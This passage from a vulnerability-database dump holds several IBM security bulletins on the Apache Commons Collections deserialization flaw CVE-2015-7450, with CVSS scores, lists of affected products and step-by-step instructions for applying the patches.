{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:25", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with Tivoli Netcool Performance Manager (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:25", "id": "16851167A6E7D383CF52D5B447DED7E09886CA93B8A9A92A25FD7998659A49D8", "href": "https://www.ibm.com/support/pages/node/272853", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:43:02", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM\u00ae DB2 Web Query for i. Apache is the underlying infrastructure for many java based products, including Web Query. While not part of Web Query itself, it was important to include the patch in Web Query updates. The following Web Query versions included the Apache vulnerability, but only for the specified group PTF levels: \n \nWeb Query 2.1.0 \u2013 group PTF levels 8, 10, 11, and 12. 
\nWeb Query 2.1.1 \u2013 group PTF level 1 \n \nThe Web Query version 2.1.0 group PTF numbers for the respective version of the IBM i operating system are: \n \nRelease 6.1 \u2013 SF99646 \nRelease 7.1 \u2013 SF99647 \nRelease 7.2 \u2013 SF99747 \n \nThe Web Query version 2.1.1 group PTF numbers are: \n \nRelease 6.1 \u2013 SF99656 \nRelease 7.1 \u2013 SF99657 \nRelease 7.2 \u2013 SF99658 \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM\u00ae DB2 Web Query for i\n\n## Remediation/Fixes\n\nThe issue can be fixed by applying one of the following Web Query group PTF levels, or by upgrading to a later release of Web Query. \n \nWeb Query 2.1.0 \u2013 group PTF level 9, 13, or later \nWeb Query 2.1.1 \u2013 group PTF level 2 or later \n \nThe current levels for Web Query group PTFs are documented in the Info APARs on the Installation pages of the product wiki at [_http://ibm.co/db2wqwiki_](<http://ibm.co/db2wqwiki>). 
\n \n**_Important note: _**IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-18T14:26:38", "type": "ibm", "title": "Security Bulletin: Web Query is affected by the Apache Commons vulnerability (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-18T14:26:38", "id": "EB6AFA1489039A0D69DE43E4858FBD0AB094FE1BB4151E4451C3BD5A83B739BC", "href": "https://www.ibm.com/support/pages/node/666883", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:48", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by the Apache Software Foundation and incorporated into an IBM WebSphere Application Server Liberty fixes.\n\n## Vulnerability Details\n\nIBM Rational Directory Server Tivoli and Rational Directory Administrator are affected by the following vulnerability: \n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)\n\n \n** 
\nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n \n**CVSS Base Score:** 9.8 \n**CVSS Temporal Score:** See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector: **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nRational Directory Server Tivoli version 5.2.1 \n\nRational Directory Administrator versions 6.0.0.0, 6.0.0.1, 6.0.0.2\n\n## Remediation/Fixes\n\nFixes for this vulnerability are available from the Apache Software Foundation and included in WebSphere Application Server (WAS) Liberty fixes. The fixes are available on IBM Support: Fix Central. \n\n**Product**| **Required WAS installation**| **Remediation/Fix on Fix Central** \n---|---|--- \nRational Directory Server Tivoli \n5.2.1| 8.5.0.2| \n[8.5.0.2-WS-WASProd_WLPArchive-IFPI52103.jar](<http://www-933.ibm.com/eserver/support/fixes/fixcentral/swgquickorder?fixes=8.5.0.2-WS-WASProd_WLPArchive-IFPI52103&productid=WebSphere%20Application%20Server&brandid=5>) \nRational Directory Administrator \n6.0.0.0, 6.0.0.1, 6.0.0.2| 8.5.5.6| \n[8556-wlp-archive-IFPI52103.jar](<http://www-933.ibm.com/eserver/support/fixes/fixcentral/swgquickorder?fixes=8556-wlp-archive-IFPI52103&productid=WebSphere%20Application%20Server&brandid=5>) \n \n\n\n**To apply the fix for ****Rational Directory Server**** Tivoli**** 5.2.1:**\n\n**Note:** The vulnerability affects the Rational Directory Administrator (RDA) that ships with Rational Directory Server Tivoli.\n\n**Note: **That you must upgrade to WebSphere Application Server Liberty 8.5.0.2 before applying this fix.\n\n \n\n\n 1. 
Open a console and navigate to the location where you downloaded the .jar file for the fix.\n 2. Run the command: java -jar 8.5.0.2-WS-WASProd_WLPArchive-IFPI52103.jar \n \nThe following launch options are available for the jar file: \n \n\\--installLocation [LibertyRootDir] \n \nBy default the jar will look for a \"wlp\" directory in its current location. The default location is in the following path in the Rational Directory Server installation: WebAppsServer/WLP_<version>. For example, WebAppsServer/WLP_8.5.5.2. If your Liberty profile install location is different than \"wlp\" and/or it is not in the same directory as the jar, then you can use this option to change where the jar will patch. [LibertyRootDir] can either be relative to the location of the jar or an absolute file path. \n \n\\--suppressInfo \n \nHides all messages other than confirming the patch has completed or error messages.\n 3. Stop Rational Directory Administrator.\n 4. Start Rational Directory Administrator. \n**Note:** By restarting Rational Directory Administrator, you are restarting the Liberty profile. \n\n \n**To apply the fix for ****Rational Directory ****Administrator ****6.0.0.0, 6.0.0.1 or 6.0.0.2:**\n\n**Note:** You must upgrade to WebSphere Application Server 8.5.5.6 before applying this fix.\n\n \n\n\n 1. Open a console and navigate to the location where you downloaded the .jar file for the fix.\n 2. Run the command: java -jar 8556-wlp-archive-IFPI52103.jar \n \nThe following launch options are available for the jar file: \n \n\\--installLocation [LibertyRootDir] \n \nBy default the jar will look for a \"wlp\" directory in its current location. The default location is in the following path in the Rational Directory Administrator installation: WebAppsServer/WLP_<version>. For example, WebAppsServer/WLP_8.5.5.2. 
If your Liberty profile install location is different than \"wlp\" and/or it is not in the same directory as the jar, then you can use this option to change where the jar will patch. [LibertyRootDir] can either be relative to the location of the jar or an absolute file path. \n \n\\--suppressInfo \n \nHides all messages other than confirming the patch has completed or error messages.\n 3. Stop Rational Directory Administrator.\n 4. Start Rational Directory Administrator. \n**Note:** By restarting Rational Directory Administrator, you are restarting the Liberty profile.\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:07:47", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Rational Directory Server Tivoli and Rational Directory Administrator (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T05:07:47", "id": 
"EA09E9FBD098387618AA1C1557D2087A05E48D2128850E8FF36CAD21565902BE", "href": "https://www.ibm.com/support/pages/node/272707", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:12", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization is addressed in the FileNet Content Manager and IBM Content Foundation products.\n\n## Vulnerability Details\n\n**CVEID:** _CVE-2015-7450_ \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with the Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFileNet Content Manager 5.1.0, 5.2.0, 5.2.1 \nIBM Content Foundation 5.2.0, 5.2.1\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **APAR**| **Remediation/First Fix Available** \n---|---|---|--- \nFileNet Content Manager| 5.1.0 \n5.2.0 \n5.2.1| PJ43729 \nPJ43728 \nPJ43728| 5.1.0.6-P8CE-IF001 - 12/4/2015 \n5.2.0.4-P8CPE-IF001 - 12/7/2015 \n5.2.1.3-P8CPE-FP003 - 12/4/2015 \nIBM Content Foundation| 5.2.0 \n5.2.1| PJ43728 \nPJ43728| 5.2.0.4-P8CPE-IF001 - 12/7/2015 \n5.2.1.3-P8CPE-FP003 - 12/4/2015 \n \nReleases available from Fix Central: <http://www.ibm.com/support/fixcentral/> \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the Open-Source Apache Commons Collections and take appropriate mitigation and remediation actions. 
\n\nIf hosting Content Platform Engine on WebSphere application server, please refer to the same vulnerability for WebSphere application server described in this Security Bulletin.[http://www.ibm.com/support/docview.wss?uid=swg21970575](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T12:13:24", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons (CVE-2015-7450), affects FileNet Content Manager and IBM Content Foundation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T12:13:24", "id": "77E4E1DA195A2142CE6FAE8E0103BFF102ED3CC6A7AF12809B16F51B400704FC", "href": "https://www.ibm.com/support/pages/node/271683", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:45:01", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM SmartCloud Provisioning for IBM Software Virtual Appliance.\n\n## Vulnerability Details\n\n**CVEID:** 
[_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM SmartCloud Provisioning 2.1 for IBM Software Virtual Appliance\n\n## Remediation/Fixes\n\nIf you are running IBM SmartCloud Provisioning 2.1 for IBM Software Virtual Appliance, contact [_IBM support_](<https://www-947.ibm.com/support/servicerequest/newServiceRequest.action>).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:30:14", "type": "ibm", "title": "Security Bulletin: Vulnerability in common-collections affects IBM SmartCloud Provisioning for IBM Software Virtual Appliance (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString":
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T22:30:14", "id": "6E142852D8578EFF0FFB850451F8784B6C1F52CF6277D449EF09B2E7015902D3", "href": "https://www.ibm.com/support/pages/node/271671", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:52:53", "description": "## Summary\n\nIBM Sterling Order Management uses Apache Commons Collections and is affected by some of the vulnerabilities that exist in this component.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** \nApache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nSterling Order Management 8.5 \nIBM Sterling Selling and Fulfillment Foundation 9.0 \nIBM Sterling Selling and Fulfillment Foundation 9.1.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 \nIBM Sterling Selling and Fulfillment Foundation 9.3.0 \nIBM Sterling Selling and Fulfillment Foundation 9.4.0\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes.
\n \n\n\n**_Product_**| **_Security Fix Pack*_**| _Remediation/First Fix_ \n---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 9.4.0| **_9.4.0-SFP1_**| [**_http://www-933.ibm.com/support/fixcentral/options_**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.3.0| **_9.3.0-SFP3_**| [**_http://www-933.ibm.com/support/fixcentral/options_**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.1| **_9.2.1-SFP4_**| [**_http://www-933.ibm.com/support/fixcentral/options_**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.0| **_9.2.0- SFP4_**| [**_http://www-933.ibm.com/support/fixcentral/options_**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.1.0| **_9.1.0- SFP4_**| [**_http://www-933.ibm.com/support/fixcentral/options_**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.0.0| **_9.0.0- SFP4_**| [**_https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US_**](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>) \nSterling Order Management 8.5| **_8.5- SFP4_**| [**_https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US_**](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T19:51:34", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management is affected by Apache Commons Collections security vulnerabilities (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T19:51:34", "id": "966028D2F952C4B8B635F792EACFB256FF35D634D1D8FF3672B50B016841858D", "href": "https://www.ibm.com/support/pages/node/540539", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:49:50", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM i2 Intelligence Analysis Platform. 
Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\n**Please consult the security bulletin **[_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>)\n\n## Affected Products and Versions\n\nAffected products and Versions\n\n| Bundled Product and version \n---|--- \nIBM i2 Intelligence Analysis Platform 3.0.1 to 3.0.9| WebSphere Application Server 8.0.0 to 8.5.5 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T21:56:55", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server bundled with IBM i2 Intelligence Analysis Platform. 
(CVE 2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T21:56:55", "id": "9AE27752CE61B7806165EEC477048C9431337F2A610460AB42D12020D03EF964", "href": "https://www.ibm.com/support/pages/node/273165", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:38", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a deployable component of IBM PureApplication System. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. 
\n\n## Vulnerability Details\n\nConsult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nPureApplication System versions 1.1, 2.0, and 2.1| IBM WebSphere Application Server 7.0 \nIBM WebSphere Application Server 8.0 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:12", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM PureApplication System (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:12", "id": "FCF66C1A96FDC8625BB9D927E042CEAA982B68F998C9AFCE8CBB28E803F9F816", "href": "https://www.ibm.com/support/pages/node/272255", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:46", "description": "## Summary\n\nA Spring 
Framework vulnerability for handling Java object deserialization was addressed by Rational Test Control Panel in Rational Test Workbench and Rational Test Virtualization Server. This vulnerability does not have its own CVE number, but is linked to CVE-2015-7450.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nRational Test Control Panel component in Rational Test Workbench and Rational Test Virtualization Server versions between **8.6 and 8.7.1.1**.\n\n## Remediation/Fixes\n\nThe fixes for the CVE(s) mentioned above have been incorporated into an interim fix available on Fix Central (<http://www-933.ibm.com/support/fixcentral/>). \n \n \nApply this fix to your installation using the instructions below: \n \n \n1\\. Identify the version of Rational Test Control Panel that you have installed. This can be discovered from IBM Installation Manager (click File -> View Installed Packages) or by clicking Help -> About in the Rational Test Control Panel web application UI. \n \n2\\. On the IBM Fix Central website, locate either the Rational Test Workbench or Rational Test Virtualization Server products. For your version of Rational Test Control Panel, download the fix identified in the list below for the product you selected.
(If your version is not listed, upgrade to the latest fix pack first.) \n \n**8.6.0.4:** RTCP-Spring.war-86.zip \n \n**8.7.0.3:** RTCP-Spring.war-870.zip \n \n**8.7.1.1:** RTCP-Spring.war-871.zip \n \n \n3\\. Stop Rational Test Control Panel. \n \nAny virtual services that were previously started through Rational Test Control Panel will continue to run, and the rules they created on any proxies or intercepts will continue to be applied. However, no new virtual services can be started in Rational Test Control Panel while the server is not running, and any virtual services started in Rational Integration Tester during this time will not be able to send rules to the intercepts and proxies, so they will not be able to dynamically configure routing to the virtual services from the test environment. \n \n4\\. Go to the Rational Test Control Panel workspace. \n \nOn Windows this is usually: \n \nC:\\IBM\\RTCP-Workspace\\ \n \nOn AIX, Linux or Solaris this is usually: \n \n/var/rtcp/ \n \nor, on those platforms, if the installer was not run as the root user, it is usually: \n \n$HOME/var/rtcp/ \n \n5\\. Copy (do not move) the following files to a safe backup location, in case you need to revert this fix: \n \nsch_db.h2.db \nsch_db.lock.db (if it is present) \nsch_db.trace.db (if it is present) \n \n6\\. Go to the Rational Test Control Panel installation directory. \n \nOn Windows this is usually: \n \n64 bit installation: C:\\Program Files\\IBM\\RationalTestControlPanel\\ \n32 bit installation: C:\\Program Files (x86)\\IBM\\RationalTestControlPanel\\ \n \nOn AIX, Linux and Solaris this is usually: \n \n/opt/IBM/RationalTestControlPanel/ \n \n7\\. Navigate to the following directory inside the installation directory: \n \nusr/servers/RTCPServer/apps/RTCP.war/WEB-INF/classes \n \n8\\.
Copy all files that end \".server.properties\" to a safe location so that you can restore them after applying the patch, as they contain configuration information specific to your installation. \n \n9\\. Navigate to the following directory inside the installation directory: \n \nusr/servers/RTCPServer/apps/ \n \n10\\. Move (do not copy) the directory called \"RTCP.war\" into a safe backup location, in case you need to revert this fix. Make sure this directory no longer exists in the \"apps\" directory before proceeding to the next step. \n \n11\\. Unzip the zip file included in the fix into the current directory (\"apps\"). This will install a fixed version of the \"RTCP.war\" directory. \n \n12\\. Navigate to the following directory inside the installation directory: \n \nusr/servers/RTCPServer/apps/RTCP.war/WEB-INF/classes \n \n13\\. Find the copies that you took in step 8, and move them back into this \"classes\" directory, overwriting any files that already exist there. \n \n14\\. Start Rational Test Control Panel. \n \n \n**TO REVERT THIS FIX:** \n \n1\\. Stop Rational Test Control Panel. \n \nSee step 1 of the installation instructions for this fix for details on how this will affect running virtual services. \n 